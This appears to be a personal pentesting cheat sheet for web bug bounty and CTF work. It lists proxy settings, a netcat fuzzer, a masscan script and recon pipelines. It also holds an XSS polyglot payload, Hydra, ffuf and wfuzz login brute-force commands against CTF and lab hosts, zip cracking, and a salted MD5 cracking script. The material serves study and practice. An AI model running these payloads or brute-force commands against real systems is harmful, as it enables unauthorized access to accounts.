# script & command #### System proxy in terminal: 
export http_proxy=http://localhost:8080     ## for setting proxy
export https_proxy=http://localhost:8080
export all_proxy=socks://127.0.0.1:8080/
ALL_PROXY
HTTP_PROXY
HTTPS_PROXY
uset http_proxy    ##for removing proxy
uset https_proxy
#### Finding specific words: ```bash find / -type f -exec grep -H 'HTTP_PROXY' {} \; ``` ## simple fuzzer: ``` #!/bin/bash server=example.org port=80 while read url do echo -ne "$url\t" echo -e "GET /$url HTTP/1.0\nHost: $server\n" | netcat $server $port | head -1 done | tee outputfile ``` ## simple bash code for masscan: ``` #!/bin/bash strip=$(echo $1 | sed 's/https\?:\/\///') echo "" echo "###########################" host $strip echo "###########################" echo "" masscan -p1-65535 $(dig +short $strip | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | head -1) --max-rate 1000 |& tee $strip_scan ``` ## Useful Bash Command: ***removing matching word:*** ``` echo 'matching character' | sed 's/\//g ``` ``` awk '{gsub("string to remove", "");print}' file-name ``` **removing trailing dot:** `sed 's/.$//'` **making each word a line:** ``` sed "s/ /\n/g" ``` ``` tr ' ' '\n' ``` **example for loop:** `for i in $(> 1.txt && assetfinder --subs-only yeswehack.com >> 1.txt && amass enum -d yeswehack.com -config /home/shamim/.config/amass/config.ini >> 1.txt && cat 1.txt | sort | unique 2.txt && cat 2.txt | nslookup | grep "canonical" >> 3.txt && awk '{gsub("canonical name =", "");print}' 3.txt | sed "s/ /\n/g" | sed 's/\.$//' | httpx -cname -probe -title -sc -server ``` ## Polygot: ``` jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e ``` ## Hydra: {% code fullWidth="false" %} ```bash hydra -L rockyou.txt -p idk -t 20 35.227.24.107 https-post-form "/b02f939d67/login:username=^USER^&password=^PASS^:Invalid username" ``` {% endcode %} ```bash hydra -l '' -P 3digits.txt -f -v 10.10.172.186 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000 ``` ### ffuf: ```bash ffuf -u https://hackyholidays.h1ctf.com/secure-login -X POST -t 50 -fr "Invalid Username" -d "username=FUZZ&password=admin" -H "Content-Type: application/x-www-form-urlencoded" -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt ``` **BruteForce using wfuzz:** ```bash wfuzz -c -w /tmp/wordlist.txt -d "log=elliot&pwd=FUZZ&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.199.89%2Fwp-admin%2F&testcookie=1" --hs "The password you entered for the username" http://10.10.199.89/wp-login.php ``` ### Crack zip: ```bash fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt my_secure_files_not_for_you.zip ``` ## Curl: ```bash curl -v -k -H "X-Requested-With:com.hacker101.webdev" -F hmac=588ba7e947958cb39f2edebc8738d13a -F file=@test.zip https://3c9493b4eceaca14bf6a6b2e96d15c22.ctf.hacker101.com/upload.php -x http://127.0.0.1:8080 ``` ## Cracking md5: ```python import hashlib with open('rockyou.txt',encoding='utf8',errors='replace') as f: for line in f: h = line.strip() + "203.0.113.33" output = hashlib.md5(h.encode('utf-8')).hexdigest() if output == "5f2940d65ca4140cc18d0878bc398955": print("HIT: "+line.strip()) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shahidulandshamim.gitbook.io/web-application/others/script-and-command.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.